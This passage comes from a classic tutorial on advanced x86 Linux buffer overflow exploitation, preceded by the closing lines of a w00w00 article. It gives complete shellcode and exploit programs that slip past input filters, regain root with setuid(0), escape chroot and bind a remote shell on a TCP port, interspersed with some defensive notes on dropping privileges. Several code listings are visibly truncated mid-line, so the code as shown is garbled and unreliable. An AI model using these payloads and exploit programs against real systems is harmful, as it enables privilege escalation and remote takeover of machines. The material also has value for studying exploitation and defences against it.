problems exist. We need to realize that the problems are out there,
waiting to be fixed.
Thanks for reading! We hope you've enjoyed it! You can e-mail me at
shok@dataforce.net, or mattc@repsec.com. See the w00w00 (www.w00w00.org)
web site, also!
------------------------------------------------------------------------------
Matt Conover (a.k.a. Shok) & w00w00 Security Team
[ http://www.w00w00.org, w00w00 Security Development (WSD) ]
[ See the URL above for information on: what w00w00 is, our ]
[ security projects (all available online), some of our ]
[ articles, and more. Enjoy! ]
Advanced buffer overflow exploit
Written by Taeho Oh ( ohhara@postech.edu )
----------------------------------------------------------------------------
Taeho Oh ( ohhara@postech.edu ) http://postech.edu/~ohhara
PLUS ( Postech Laboratory for Unix Security ) http://postech.edu/plus
PosLUG ( Postech Linux User Group ) http://postech.edu/group/poslug
----------------------------------------------------------------------------
1. Introduction
Nowadays there are many buffer overflow exploit codes. The early buffer
overflow exploit codes only spawned a shell ( executed /bin/sh ). However,
some of today's buffer overflow exploit codes have very nice features,
for example passing through filtering, opening a socket, breaking chroot,
and so on. This paper will attempt to explain these advanced buffer overflow
exploit skills under intel x86 linux.
2. What do you have to know before reading?
You have to know assembly language, the C language, and Linux. Of course, you
have to know what a buffer overflow is. You can get information about
buffer overflows in phrack 49-14 ( Smashing The Stack For Fun And Profit
by Aleph1 ). It is a wonderful paper on buffer overflows and I highly recommend
that you read it before reading this one.
3. Pass through filtering
There are many programs which have buffer overflow problems. Why are not
all buffer overflow problems exploited? Because even if a program has a buffer
overflow condition, it can be hard to exploit. In many cases, the reason is
that the program filters some characters or converts characters into other
characters. If the program filters all non-printable characters, it's too
hard to exploit. If the program filters only some characters, you can pass
through the filter by making good buffer overflow exploit code. :)
3.1 The example vulnerable program
vulnerable1.c
----------------------------------------------------------------------------
#include
#include
int main(int argc,char **argv)
{
char buffer[1024];
int i;
if(argc>1)
{
for(i=0;i
#include
#define ALIGN 0
#define OFFSET 0
#define RET_POSITION 1024
#define RANGE 20
#define NOP 0x90
char shellcode[]=
"\xeb\x38" /* jmp 0x38 */
"\x5e" /* popl %esi */
"\x80\x46\x01\x50" /* addb $0x50,0x1(%esi) */
"\x80\x46\x02\x50" /* addb $0x50,0x2(%esi) */
"\x80\x46\x03\x50" /* addb $0x50,0x3(%esi) */
"\x80\x46\x05\x50" /* addb $0x50,0x5(%esi) */
"\x80\x46\x06\x50" /* addb $0x50,0x6(%esi) */
"\x89\xf0" /* movl %esi,%eax */
"\x83\xc0\x08" /* addl $0x8,%eax */
"\x89\x46\x08" /* movl %eax,0x8(%esi) */
"\x31\xc0" /* xorl %eax,%eax */
"\x88\x46\x07" /* movb %eax,0x7(%esi) */
"\x89\x46\x0c" /* movl %eax,0xc(%esi) */
"\xb0\x0b" /* movb $0xb,%al */
"\x89\xf3" /* movl %esi,%ebx */
"\x8d\x4e\x08" /* leal 0x8(%esi),%ecx */
"\x8d\x56\x0c" /* leal 0xc(%esi),%edx */
"\xcd\x80" /* int $0x80 */
"\x31\xdb" /* xorl %ebx,%ebx */
"\x89\xd8" /* movl %ebx,%eax */
"\x40" /* inc %eax */
"\xcd\x80" /* int $0x80 */
"\xe8\xc3\xff\xff\xff" /* call -0x3d */
"\x2f\x12\x19\x1e\x2f\x23\x18"; /* .string "/bin/sh" */
/* /bin/sh is disguised */
unsigned long get_sp(void)
{
__asm__("movl %esp,%eax");
}
main(int argc,char **argv)
{
char buff[RET_POSITION+RANGE+ALIGN+1],*ptr;
long addr;
unsigned long sp;
int offset=OFFSET,bsize=RET_POSITION+RANGE+ALIGN+1;
int i;
if(argc>1)
offset=atoi(argv[1]);
sp=get_sp();
addr=sp-offset;
for(i=0;i>8;
buff[i+ALIGN+2]=(addr&0x00ff0000)>>16;
buff[i+ALIGN+3]=(addr&0xff000000)>>24;
}
for(i=0;i
#include
int main(int argc,char **argv)
{
char buffer[1024];
seteuid(getuid());
if(argc>1)
strcpy(buffer,argv[1]);
}
----------------------------------------------------------------------------
This vulnerable program calls seteuid(getuid()) at start. Therefore, you
may think that "strcpy(buffer,argv[1]);" is OK, because you can only get
your own shell even if you succeed in the buffer overflow attack. However,
seteuid() changes only the effective uid; the saved uid is still root. So
if you insert code which calls setuid(0) into the shellcode, you can get
a root shell. :)
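For comparison, here is a sketch of how a program could give up its
privileges so that a later setuid(0) fails. The function name is
hypothetical, and the sketch assumes a program that is set-uid root: for
a program that is set-uid to some other user, setuid() does not clear the
saved uid and a different call (setresuid() where it exists) would be
needed.

```c
#include <sys/types.h>
#include <unistd.h>

/*
 * Hypothetical helper: give up set-uid/set-gid privileges for good.
 * Returns 0 on success, -1 on failure.
 */
int drop_privileges_permanently(void)
{
    uid_t ruid = getuid();
    gid_t rgid = getgid();

    /* Group first: once the uid is dropped we may no longer be allowed to. */
    if (setgid(rgid) != 0)
        return -1;

    /* When the effective uid is root, setuid() sets the real, effective
     * and saved uid in one go. */
    if (setuid(ruid) != 0)
        return -1;

    if (geteuid() != ruid)
        return -1;

    /* If the caller is not root, regaining root must now fail. */
    if (ruid != 0 && setuid(0) == 0)
        return -1;

    return 0;
}
```

Had vulnerable2 called something like this instead of seteuid(getuid()),
the setuid(0) code in the next section would simply return an error.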
4.2 Make setuid(0) code
setuidasm.c
----------------------------------------------------------------------------
main()
{
setuid(0);
}
----------------------------------------------------------------------------
compile and disassemble
----------------------------------------------------------------------------
[ ohhara@ohhara ~ ] {1} $ gcc -o setuidasm -static setuidasm.c
[ ohhara@ohhara ~ ] {2} $ gdb setuidasm
GNU gdb 4.17
Copyright 1998 Free Software Foundation, Inc.
GDB is free software, covered by the GNU General Public License, and you are
welcome to change it and/or distribute copies of it under certain conditions.
Type "show copying" to see the conditions.
There is absolutely no warranty for GDB. Type "show warranty" for details.
This GDB was configured as "i386-redhat-linux"...
(gdb) disassemble setuid
Dump of assembler code for function __setuid:
0x804ca00 <__setuid>: movl %ebx,%edx
0x804ca02 <__setuid+2>: movl 0x4(%esp,1),%ebx
0x804ca06 <__setuid+6>: movl $0x17,%eax
0x804ca0b <__setuid+11>: int $0x80
0x804ca0d <__setuid+13>: movl %edx,%ebx
0x804ca0f <__setuid+15>: cmpl $0xfffff001,%eax
0x804ca14 <__setuid+20>: jae 0x804cc10 <__syscall_error>
0x804ca1a <__setuid+26>: ret
0x804ca1b <__setuid+27>: nop
0x804ca1c <__setuid+28>: nop
0x804ca1d <__setuid+29>: nop
0x804ca1e <__setuid+30>: nop
0x804ca1f <__setuid+31>: nop
End of assembler dump.
(gdb)
----------------------------------------------------------------------------
setuid(0); code
----------------------------------------------------------------------------
char code[]=
"\x31\xc0" /* xorl %eax,%eax */
"\x31\xdb" /* xorl %ebx,%ebx */
"\xb0\x17" /* movb $0x17,%al */
"\xcd\x80"; /* int $0x80 */
----------------------------------------------------------------------------
4.3 Modify the normal shellcode
Making the new shellcode is very easy once you have the setuid(0) code. Just
insert the code at the start of the normal shellcode.
new shellcode
----------------------------------------------------------------------------
char shellcode[]=
"\x31\xc0" /* xorl %eax,%eax */
"\x31\xdb" /* xorl %ebx,%ebx */
"\xb0\x17" /* movb $0x17,%al */
"\xcd\x80" /* int $0x80 */
"\xeb\x1f" /* jmp 0x1f */
"\x5e" /* popl %esi */
"\x89\x76\x08" /* movl %esi,0x8(%esi) */
"\x31\xc0" /* xorl %eax,%eax */
"\x88\x46\x07" /* movb %al,0x7(%esi) */
"\x89\x46\x0c" /* movl %eax,0xc(%esi) */
"\xb0\x0b" /* movb $0xb,%al */
"\x89\xf3" /* movl %esi,%ebx */
"\x8d\x4e\x08" /* leal 0x8(%esi),%ecx */
"\x8d\x56\x0c" /* leal 0xc(%esi),%edx */
"\xcd\x80" /* int $0x80 */
"\x31\xdb" /* xorl %ebx,%ebx */
"\x89\xd8" /* movl %ebx,%eax */
"\x40" /* inc %eax */
"\xcd\x80" /* int $0x80 */
"\xe8\xdc\xff\xff\xff" /* call -0x24 */
"/bin/sh"; /* .string \"/bin/sh\" */
----------------------------------------------------------------------------
4.4 Exploit vulnerable2 program
With this shellcode, you can easily write the exploit code.
exploit2.c
----------------------------------------------------------------------------
#include <stdio.h>
#include <stdlib.h>
#define ALIGN 0
#define OFFSET 0
#define RET_POSITION 1024
#define RANGE 20
#define NOP 0x90
char shellcode[]=
"\x31\xc0" /* xorl %eax,%eax */
"\x31\xdb" /* xorl %ebx,%ebx */
"\xb0\x17" /* movb $0x17,%al */
"\xcd\x80" /* int $0x80 */
"\xeb\x1f" /* jmp 0x1f */
"\x5e" /* popl %esi */
"\x89\x76\x08" /* movl %esi,0x8(%esi) */
"\x31\xc0" /* xorl %eax,%eax */
"\x88\x46\x07" /* movb %al,0x7(%esi) */
"\x89\x46\x0c" /* movl %eax,0xc(%esi) */
"\xb0\x0b" /* movb $0xb,%al */
"\x89\xf3" /* movl %esi,%ebx */
"\x8d\x4e\x08" /* leal 0x8(%esi),%ecx */
"\x8d\x56\x0c" /* leal 0xc(%esi),%edx */
"\xcd\x80" /* int $0x80 */
"\x31\xdb" /* xorl %ebx,%ebx */
"\x89\xd8" /* movl %ebx,%eax */
"\x40" /* inc %eax */
"\xcd\x80" /* int $0x80 */
"\xe8\xdc\xff\xff\xff" /* call -0x24 */
"/bin/sh"; /* .string \"/bin/sh\" */
unsigned long get_sp(void)
{
__asm__("movl %esp,%eax");
}
void main(int argc,char **argv)
{
char buff[RET_POSITION+RANGE+ALIGN+1],*ptr;
long addr;
unsigned long sp;
int offset=OFFSET,bsize=RET_POSITION+RANGE+ALIGN+1;
int i;
if(argc>1)
offset=atoi(argv[1]);
sp=get_sp();
addr=sp-offset;
for(i=0;i>8;
buff[i+ALIGN+2]=(addr&0x00ff0000)>>16;
buff[i+ALIGN+3]=(addr&0xff000000)>>24;
}
for(i=0;i
#include
int main(int argc,char **argv)
{
char buffer[1024];
chroot("/home/ftp");
chdir("/");
if(argc>1)
strcpy(buffer,argv[1]);
}
----------------------------------------------------------------------------
If you try to execute "/bin/sh" with a buffer overflow, it may execute
"/home/ftp/bin/sh" ( if it exists ) and you cannot access any directories
other than "/home/ftp".
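Note that vulnerable3 is still running as root after the chroot() call,
and that is what the following sections depend on. Below is a sketch of a
more careful way to enter a jail: change into it, confine, then give up
root. The function name and the choice of uid/gid are assumptions for
illustration only.

```c
#define _DEFAULT_SOURCE   /* for chroot() and setgroups() on glibc */
#include <assert.h>
#include <grp.h>
#include <sys/types.h>
#include <unistd.h>

/*
 * Hypothetical helper: confine the process to dir and drop root.
 * Must be called as root. Returns 0 on success, -1 on failure.
 */
int enter_jail(const char *dir, uid_t uid, gid_t gid)
{
    assert(dir != NULL);

    if (uid == 0)
        return -1;            /* staying root would defeat the purpose */

    if (chdir(dir) != 0)      /* be inside the jail before confining */
        return -1;
    if (chroot(".") != 0)
        return -1;
    if (chdir("/") != 0)
        return -1;

    /* A root process can call chroot() again and walk out, so drop
     * supplementary groups, then gid, then uid. */
    if (setgroups(1, &gid) != 0)
        return -1;
    if (setgid(gid) != 0)
        return -1;
    if (setuid(uid) != 0)
        return -1;

    return 0;
}
```

With the process no longer root inside the jail, the mkdir()/chroot()
sequence shown next fails at its first chroot() call.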
5.2 Make break chroot code
If you can execute the code below, you can break chroot.
breakchrootasm.c
----------------------------------------------------------------------------
main()
{
mkdir("sh",0755);
chroot("sh");
/* many "../" */
chroot("../../../../../../../../../../../../../../../../");
}
----------------------------------------------------------------------------
This break chroot code makes a "sh" directory, because the name is easy to
reference. ( the same string is also used to execute "/bin/sh" )
compile and disassemble
----------------------------------------------------------------------------
[ ohhara@ohhara ~ ] {1} $ gcc -o breakchrootasm -static breakchrootasm.c
[ ohhara@ohhara ~ ] {2} $ gdb breakchrootasm
GNU gdb 4.17
Copyright 1998 Free Software Foundation, Inc.
GDB is free software, covered by the GNU General Public License, and you are
welcome to change it and/or distribute copies of it under certain conditions.
Type "show copying" to see the conditions.
There is absolutely no warranty for GDB. Type "show warranty" for details.
This GDB was configured as "i386-redhat-linux"...
(gdb) disassemble mkdir
Dump of assembler code for function __mkdir:
0x804cac0 <__mkdir>: movl %ebx,%edx
0x804cac2 <__mkdir+2>: movl 0x8(%esp,1),%ecx
0x804cac6 <__mkdir+6>: movl 0x4(%esp,1),%ebx
0x804caca <__mkdir+10>: movl $0x27,%eax
0x804cacf <__mkdir+15>: int $0x80
0x804cad1 <__mkdir+17>: movl %edx,%ebx
0x804cad3 <__mkdir+19>: cmpl $0xfffff001,%eax
0x804cad8 <__mkdir+24>: jae 0x804cc40 <__syscall_error>
0x804cade <__mkdir+30>: ret
0x804cadf <__mkdir+31>: nop
End of assembler dump.
(gdb) disassemble chroot
Dump of assembler code for function chroot:
0x804cb60 <chroot>: movl %ebx,%edx
0x804cb62 <chroot+2>: movl 0x4(%esp,1),%ebx
0x804cb66 <chroot+6>: movl $0x3d,%eax
0x804cb6b <chroot+11>: int $0x80
0x804cb6d <chroot+13>: movl %edx,%ebx
0x804cb6f <chroot+15>: cmpl $0xfffff001,%eax
0x804cb74 <chroot+20>: jae 0x804cc40 <__syscall_error>
0x804cb7a <chroot+26>: ret
0x804cb7b <chroot+27>: nop
0x804cb7c <chroot+28>: nop
0x804cb7d <chroot+29>: nop
0x804cb7e <chroot+30>: nop
0x804cb7f <chroot+31>: nop
End of assembler dump.
(gdb)
----------------------------------------------------------------------------
mkdir("sh",0755); code
----------------------------------------------------------------------------
/* mkdir first argument is %ebx and second argument is */
/* %ecx. */
char code[]=
"\x31\xc0" /* xorl %eax,%eax */
"\x31\xc9" /* xorl %ecx,%ecx */
"\xb0\x27" /* movb $0x27,%al */
"\x8d\x5e\x05" /* leal 0x5(%esi),%ebx */
/* %esi has to reference "/bin/sh" before using this */
/* instruction. This instruction loads the address of "sh" */
/* and stores it in %ebx */
"\xfe\xc5" /* incb %ch */
/* %cx = 0000 0001 0000 0000 */
"\xb1\xed" /* movb $0xed,%cl */
/* %cx = 0000 0001 1110 1101 */
/* %cx = 000 111 101 101 */
/* %cx = 0 7 5 5 */
"\xcd\x80"; /* int $0x80 */
----------------------------------------------------------------------------
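The %cx comments in the mkdir code can be checked with a few lines of C.
The mode 0755 is 0x1ed, and it is built from a high byte of 0x01 (the
incb %ch) and a low byte of 0xed (the movb into %cl). make_cx() is just
an illustrative name for that arithmetic.

```c
#include <stdint.h>

/* Combine a high byte (%ch) and a low byte (%cl) into the 16-bit %cx. */
uint16_t make_cx(uint8_t ch, uint8_t cl)
{
    return (uint16_t)(((uint16_t)ch << 8) | cl);
}
```

make_cx(0x01, 0xed) gives 0x1ed, which is octal 0755, the mode passed to
mkdir().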
chroot("sh"); code
----------------------------------------------------------------------------
/* chroot first argument is ebx */
char code[]=
"\x31\xc0" /* xorl %eax,%eax */
"\x8d\x5e\x05" /* leal 0x5(%esi),%ebx */
"\xb0\x3d" /* movb $0x3d,%al */
"\xcd\x80"; /* int $0x80 */
----------------------------------------------------------------------------
chroot("../../../../../../../../../../../../../../../../"); code
----------------------------------------------------------------------------
char code[]=
"\xbb\xd2\xd1\xd0\xff" /* movl $0xffd0d1d2,%ebx */
/* disguised "../" character string */
"\xf7\xdb" /* negl %ebx */
/* %ebx = $0x002f2e2e */
/* intel x86 is little endian. */
/* %ebx = "../" */
"\x31\xc9" /* xorl %ecx,%ecx */
"\xb1\x10" /* movb $0x10,%cl */
/* prepare for looping 16 times. */
"\x56" /* pushl %esi */
/* backup current %esi. %esi has the pointer of */
/* "/bin/sh". */
"\x01\xce" /* addl %ecx,%esi */
"\x89\x1e" /* movl %ebx,(%esi) */
"\x83\xc6\x03" /* addl $0x3,%esi */
"\xe0\xf9" /* loopne -0x7 */
/* make "../../../../ . . . " character string at */
/* 0x10(%esi) by looping. */
"\x5e" /* popl %esi */
/* restore %esi. */
"\xb0\x3d" /* movb $0x3d,%al */
"\x8d\x5e\x10" /* leal 0x10(%esi),%ebx */
/* %ebx has the address of "../../../../ . . . ". */
"\xcd\x80"; /* int $0x80 */
----------------------------------------------------------------------------
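The "disguised" constant can be verified the same way. negl computes the
two's complement, and because x86 is little endian the resulting 32-bit
value is laid out in memory as the characters '.', '.', '/' and a
terminating zero. The helper names below are ours.

```c
#include <assert.h>
#include <stddef.h>
#include <stdint.h>

/* Two's-complement negation, as the x86 negl instruction computes it. */
uint32_t negl(uint32_t value)
{
    return (uint32_t)(0u - value);
}

/* Write a 32-bit value to out[0..3] in little-endian byte order. */
void store_le32(char *out, uint32_t value)
{
    size_t i;

    assert(out != NULL);
    for (i = 0; i < 4; i++)
        out[i] = (char)((value >> (i * 8)) & 0xff);
}
```

negl(0xffd0d1d2) is 0x002f2e2e, and storing that with store_le32() gives
the string "../".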
5.3 Modify the normal shellcode
Making the new shellcode is very easy once you have the break chroot code.
Just insert the code at the start of the normal shellcode and adjust the jmp
and call arguments.
new shellcode
----------------------------------------------------------------------------
char shellcode[]=
"\xeb\x4f" /* jmp 0x4f */
"\x31\xc0" /* xorl %eax,%eax */
"\x31\xc9" /* xorl %ecx,%ecx */
"\x5e" /* popl %esi */
"\x88\x46\x07" /* movb %al,0x7(%esi) */
"\xb0\x27" /* movb $0x27,%al */
"\x8d\x5e\x05" /* leal 0x5(%esi),%ebx */
"\xfe\xc5" /* incb %ch */
"\xb1\xed" /* movb $0xed,%cl */
"\xcd\x80" /* int $0x80 */
"\x31\xc0" /* xorl %eax,%eax */
"\x8d\x5e\x05" /* leal 0x5(%esi),%ebx */
"\xb0\x3d" /* movb $0x3d,%al */
"\xcd\x80" /* int $0x80 */
"\x31\xc0" /* xorl %eax,%eax */
"\xbb\xd2\xd1\xd0\xff" /* movl $0xffd0d1d2,%ebx */
"\xf7\xdb" /* negl %ebx */
"\x31\xc9" /* xorl %ecx,%ecx */
"\xb1\x10" /* movb $0x10,%cl */
"\x56" /* pushl %esi */
"\x01\xce" /* addl %ecx,%esi */
"\x89\x1e" /* movl %ebx,(%esi) */
"\x83\xc6\x03" /* addl %0x3,%esi */
"\xe0\xf9" /* loopne -0x7 */
"\x5e" /* popl %esi */
"\xb0\x3d" /* movb $0x3d,%al */
"\x8d\x5e\x10" /* leal 0x10(%esi),%ebx */
"\xcd\x80" /* int $0x80 */
"\x31\xc0" /* xorl %eax,%eax */
"\x89\x76\x08" /* movl %esi,0x8(%esi) */
"\x89\x46\x0c" /* movl %eax,0xc(%esi) */
"\xb0\x0b" /* movb $0xb,%al */
"\x89\xf3" /* movl %esi,%ebx */
"\x8d\x4e\x08" /* leal 0x8(%esi),%ecx */
"\x8d\x56\x0c" /* leal 0xc(%esi),%edx */
"\xcd\x80" /* int $0x80 */
"\xe8\xac\xff\xff\xff" /* call -0x54 */
"/bin/sh"; /* .string \"/bin/sh\" */
----------------------------------------------------------------------------
5.4 Exploit vulnerable3 program
With this shellcode, writing the exploit code is straightforward.
exploit3.c
----------------------------------------------------------------------------
#include
#include
#define ALIGN 0
#define OFFSET 0
#define RET_POSITION 1024
#define RANGE 20
#define NOP 0x90
char shellcode[]=
"\xeb\x4f" /* jmp 0x4f */
"\x31\xc0" /* xorl %eax,%eax */
"\x31\xc9" /* xorl %ecx,%ecx */
"\x5e" /* popl %esi */
"\x88\x46\x07" /* movb %al,0x7(%esi) */
"\xb0\x27" /* movb $0x27,%al */
"\x8d\x5e\x05" /* leal 0x5(%esi),%ebx */
"\xfe\xc5" /* incb %ch */
"\xb1\xed" /* movb $0xed,%cl */
"\xcd\x80" /* int $0x80 */
"\x31\xc0" /* xorl %eax,%eax */
"\x8d\x5e\x05" /* leal 0x5(%esi),%ebx */
"\xb0\x3d" /* movb $0x3d,%al */
"\xcd\x80" /* int $0x80 */
"\x31\xc0" /* xorl %eax,%eax */
"\xbb\xd2\xd1\xd0\xff" /* movl $0xffd0d1d2,%ebx */
"\xf7\xdb" /* negl %ebx */
"\x31\xc9" /* xorl %ecx,%ecx */
"\xb1\x10" /* movb $0x10,%cl */
"\x56" /* pushl %esi */
"\x01\xce" /* addl %ecx,%esi */
"\x89\x1e" /* movl %ebx,(%esi) */
"\x83\xc6\x03" /* addl $0x3,%esi */
"\xe0\xf9" /* loopne -0x7 */
"\x5e" /* popl %esi */
"\xb0\x3d" /* movb $0x3d,%al */
"\x8d\x5e\x10" /* leal 0x10(%esi),%ebx */
"\xcd\x80" /* int $0x80 */
"\x31\xc0" /* xorl %eax,%eax */
"\x89\x76\x08" /* movl %esi,0x8(%esi) */
"\x89\x46\x0c" /* movl %eax,0xc(%esi) */
"\xb0\x0b" /* movb $0xb,%al */
"\x89\xf3" /* movl %esi,%ebx */
"\x8d\x4e\x08" /* leal 0x8(%esi),%ecx */
"\x8d\x56\x0c" /* leal 0xc(%esi),%edx */
"\xcd\x80" /* int $0x80 */
"\xe8\xac\xff\xff\xff" /* call -0x54 */
"/bin/sh"; /* .string \"/bin/sh\" */
unsigned long get_sp(void)
{
__asm__("movl %esp,%eax");
}
void main(int argc,char **argv)
{
char buff[RET_POSITION+RANGE+ALIGN+1],*ptr;
long addr;
unsigned long sp;
int offset=OFFSET,bsize=RET_POSITION+RANGE+ALIGN+1;
int i;
if(argc>1)
offset=atoi(argv[1]);
sp=get_sp();
addr=sp-offset;
for(i=0;i>8;
buff[i+ALIGN+2]=(addr&0x00ff0000)>>16;
buff[i+ALIGN+3]=(addr&0xff000000)>>24;
}
for(i=0;i
int main(int argc,char **argv)
{
char buffer[1024];
if(argc>1)
strcpy(buffer,argv[1]);
}
----------------------------------------------------------------------------
This is a standard vulnerable program. I will use it to demonstrate the socket
opening buffer overflow, because I am too lazy to write an example daemon
program. :) However, once you see the code, you will not be disappointed.
6.2 Make open socket code
If you can execute the code below, you can open a socket. It listens on TCP
port 30464 and attaches a shell to the first connection it accepts.
opensocketasm1.c
----------------------------------------------------------------------------
#include <unistd.h>
#include <sys/socket.h>
#include <netinet/in.h>
int soc,cli,soc_len;
struct sockaddr_in serv_addr;
struct sockaddr_in cli_addr;
int main()
{
if(fork()==0)
{
serv_addr.sin_family=AF_INET;
serv_addr.sin_addr.s_addr=htonl(INADDR_ANY);
serv_addr.sin_port=htons(30464);
soc=socket(AF_INET,SOCK_STREAM,IPPROTO_TCP);
bind(soc,(struct sockaddr *)&serv_addr,sizeof(serv_addr));
listen(soc,1);
soc_len=sizeof(cli_addr);
cli=accept(soc,(struct sockaddr *)&cli_addr,&soc_len);
dup2(cli,0);
dup2(cli,1);
dup2(cli,2);
execl("/bin/sh","sh",0);
}
}
----------------------------------------------------------------------------
As written, this is difficult to translate into assembly language. You can
simplify the program first by replacing the macros and function calls with
their constant values.
opensocketasm2.c
----------------------------------------------------------------------------
#include <unistd.h>
#include <sys/socket.h>
#include <netinet/in.h>
int soc,cli;
struct sockaddr_in serv_addr;
int main()
{
if(fork()==0)
{
serv_addr.sin_family=2;
serv_addr.sin_addr.s_addr=0;
serv_addr.sin_port=0x77;
soc=socket(2,1,6);
bind(soc,(struct sockaddr *)&serv_addr,0x10);
listen(soc,1);
cli=accept(soc,0,0);
dup2(cli,0);
dup2(cli,1);
dup2(cli,2);
execl("/bin/sh","sh",0);
}
}
----------------------------------------------------------------------------
compile and disassemble
----------------------------------------------------------------------------
[ ohhara@ohhara ~ ] {1} $ gcc -o opensocketasm2 -static opensocketasm2.c
[ ohhara@ohhara ~ ] {2} $ gdb opensocketasm2
GNU gdb 4.17
Copyright 1998 Free Software Foundation, Inc.
GDB is free software, covered by the GNU General Public License, and you are
welcome to change it and/or distribute copies of it under certain conditions.
Type "show copying" to see the conditions.
There is absolutely no warranty for GDB. Type "show warranty" for details.
This GDB was configured as "i386-redhat-linux"...
(gdb) disassemble fork
Dump of assembler code for function fork:
0x804ca90 <fork>: movl $0x2,%eax
0x804ca95 <fork+5>: int $0x80
0x804ca97 <fork+7>: cmpl $0xfffff001,%eax
0x804ca9c <fork+12>: jae 0x804cdc0 <__syscall_error>
0x804caa2 <fork+18>: ret
0x804caa3 <fork+19>: nop
0x804caa4 <fork+20>: nop
0x804caa5 <fork+21>: nop
0x804caa6 <fork+22>: nop
0x804caa7 <fork+23>: nop
0x804caa8 <fork+24>: nop
0x804caa9 <fork+25>: nop
0x804caaa <fork+26>: nop
0x804caab <fork+27>: nop
0x804caac <fork+28>: nop
0x804caad <fork+29>: nop
0x804caae <fork+30>: nop
0x804caaf <fork+31>: nop
End of assembler dump.
(gdb) disassemble socket
Dump of assembler code for function socket:
0x804cda0 <socket>: movl %ebx,%edx
0x804cda2 <socket+2>: movl $0x66,%eax
0x804cda7 <socket+7>: movl $0x1,%ebx
0x804cdac <socket+12>: leal 0x4(%esp,1),%ecx
0x804cdb0 <socket+16>: int $0x80
0x804cdb2 <socket+18>: movl %edx,%ebx
0x804cdb4 <socket+20>: cmpl $0xffffff83,%eax
0x804cdb7 <socket+23>: jae 0x804cdc0 <__syscall_error>
0x804cdbd <socket+29>: ret
0x804cdbe <socket+30>: nop
0x804cdbf <socket+31>: nop
End of assembler dump.
(gdb) disassemble bind
Dump of assembler code for function bind:
0x804cd60 <bind>: movl %ebx,%edx
0x804cd62 <bind+2>: movl $0x66,%eax
0x804cd67 <bind+7>: movl $0x2,%ebx
0x804cd6c <bind+12>: leal 0x4(%esp,1),%ecx
0x804cd70 <bind+16>: int $0x80
0x804cd72 <bind+18>: movl %edx,%ebx
0x804cd74 <bind+20>: cmpl $0xffffff83,%eax
0x804cd77 <bind+23>: jae 0x804cdc0 <__syscall_error>
0x804cd7d <bind+29>: ret
0x804cd7e <bind+30>: nop
0x804cd7f <bind+31>: nop
End of assembler dump.
(gdb) disassemble listen
Dump of assembler code for function listen:
0x804cd80 <listen>: movl %ebx,%edx
0x804cd82 <listen+2>: movl $0x66,%eax
0x804cd87 <listen+7>: movl $0x4,%ebx
0x804cd8c <listen+12>: leal 0x4(%esp,1),%ecx
0x804cd90 <listen+16>: int $0x80
0x804cd92 <listen+18>: movl %edx,%ebx
0x804cd94 <listen+20>: cmpl $0xffffff83,%eax
0x804cd97 <listen+23>: jae 0x804cdc0 <__syscall_error>
0x804cd9d <listen+29>: ret
0x804cd9e <listen+30>: nop
0x804cd9f <listen+31>: nop
End of assembler dump.
(gdb) disassemble accept
Dump of assembler code for function __accept:
0x804cd40 <__accept>: movl %ebx,%edx
0x804cd42 <__accept+2>: movl $0x66,%eax
0x804cd47 <__accept+7>: movl $0x5,%ebx
0x804cd4c <__accept+12>: leal 0x4(%esp,1),%ecx
0x804cd50 <__accept+16>: int $0x80
0x804cd52 <__accept+18>: movl %edx,%ebx
0x804cd54 <__accept+20>: cmpl $0xffffff83,%eax
0x804cd57 <__accept+23>: jae 0x804cdc0 <__syscall_error>
0x804cd5d <__accept+29>: ret
0x804cd5e <__accept+30>: nop
0x804cd5f <__accept+31>: nop
End of assembler dump.
(gdb) disassemble dup2
Dump of assembler code for function dup2:
0x804cbe0 <dup2>: movl %ebx,%edx
0x804cbe2 <dup2+2>: movl 0x8(%esp,1),%ecx
0x804cbe6 <dup2+6>: movl 0x4(%esp,1),%ebx
0x804cbea <dup2+10>: movl $0x3f,%eax
0x804cbef <dup2+15>: int $0x80
0x804cbf1 <dup2+17>: movl %edx,%ebx
0x804cbf3 <dup2+19>: cmpl $0xfffff001,%eax
0x804cbf8 <dup2+24>: jae 0x804cdc0 <__syscall_error>
0x804cbfe <dup2+30>: ret
0x804cbff <dup2+31>: nop
End of assembler dump.
(gdb)
----------------------------------------------------------------------------
fork(); code
----------------------------------------------------------------------------
char code[]=
"\x31\xc0" /* xorl %eax,%eax */
"\xb0\x02" /* movb $0x2,%al */
"\xcd\x80"; /* int $0x80 */
----------------------------------------------------------------------------
socket(2,1,6); code
----------------------------------------------------------------------------
/* %ecx is a pointer of all arguments. */
char code[]=
"\x31\xc0" /* xorl %eax,%eax */
"\x31\xdb" /* xorl %ebx,%ebx */
"\x89\xf1" /* movl %esi,%ecx */
"\xb0\x02" /* movb $0x2,%al */
"\x89\x06" /* movl %eax,(%esi) */
/* The first argument. */
/* %esi must already point to free memory before */
/* this instruction is used. */
"\xb0\x01" /* movb $0x1,%al */
"\x89\x46\x04" /* movl %eax,0x4(%esi) */
/* The second argument. */
"\xb0\x06" /* movb $0x6,%al */
"\x89\x46\x08" /* movl %eax,0x8(%esi) */
/* The third argument. */
"\xb0\x66" /* movb $0x66,%al */
"\xb3\x01" /* movb $0x1,%bl */
"\xcd\x80"; /* int $0x80 */
----------------------------------------------------------------------------
bind(soc,(struct sockaddr *)&serv_addr,0x10); code
----------------------------------------------------------------------------
/* %ecx is a pointer of all arguments. */
char code[]=
"\x89\xf1" /* movl %esi,%ecx */
"\x89\x06" /* movl %eax,(%esi) */
/* %eax has to have soc value before using this */
/* instruction. */
/* the first argument. */
"\xb0\x02" /* movb $0x2,%al */
"\x66\x89\x46\x0c" /* movw %ax,0xc(%esi) */
/* serv_addr.sin_family=2 */
/* 2 is stored at 0xc(%esi). */
"\xb0\x77" /* movb $0x77,%al */
"\x66\x89\x46\x0e" /* movw %ax,0xe(%esi) */
/* store port number at 0xe(%esi) */
"\x8d\x46\x0c" /* leal 0xc(%esi),%eax */
/* %eax = the address of serv_addr */
"\x89\x46\x04" /* movl %eax,0x4(%esi) */
/* the second argument. */
"\x31\xc0" /* xorl %eax,%eax */
"\x89\x46\x10" /* movl %eax,0x10(%esi) */
/* serv_addr.sin_addr.s_addr=0 */
/* 0 is stored at 0x10(%esi). */
"\xb0\x10" /* movb $0x10,%al */
"\x89\x46\x08" /* movl %eax,0x8(%esi) */
/* the third argument. */
"\xb0\x66" /* movb $0x66,%al */
"\xb3\x02" /* movb $0x2,%bl */
"\xcd\x80"; /* int $0x80 */
----------------------------------------------------------------------------
listen(soc,1); code
----------------------------------------------------------------------------
/* %ecx is a pointer of all arguments. */
char code[]=
"\x89\xf1" /* movl %esi,%ecx */
"\x89\x06" /* movl %eax,(%esi) */
/* %eax has to have soc value before using this */
/* instruction. */
